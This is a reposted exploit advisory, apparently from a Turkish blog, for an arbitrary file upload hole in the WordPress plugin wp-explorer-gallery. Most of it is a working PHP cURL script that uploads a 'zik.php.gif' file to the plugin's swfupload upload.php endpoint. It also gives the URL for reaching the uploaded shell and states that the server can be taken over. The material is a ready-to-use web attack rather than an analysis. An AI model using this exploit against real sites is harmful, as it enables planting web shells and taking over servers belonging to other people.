WordPress plugins wp-explorer-gallery Arbitrary File Upload Vulnerability

WordPress plugins wp-explorer-gallery Arbitrary File Upload Açığı bulunmuştur.
açıkla php Shell upload edilebilmekte servere erişim sağlanabilmektedir.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins  -  wp-explorer-gallery Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => nO x)
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-explorer-gallery.zip
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-';     // Characters allowed in the file name (in a Regular Expression format)
------------------
 
-----------
#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads//'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/wp-content/uploads/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------
 
Greet'z To #=> KedAns-Dz - JIGsaw - Elite Trojan - Anonymous Algeria - DZMafia & All Inj3ct0r Member  <= Th3 End ^_^

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir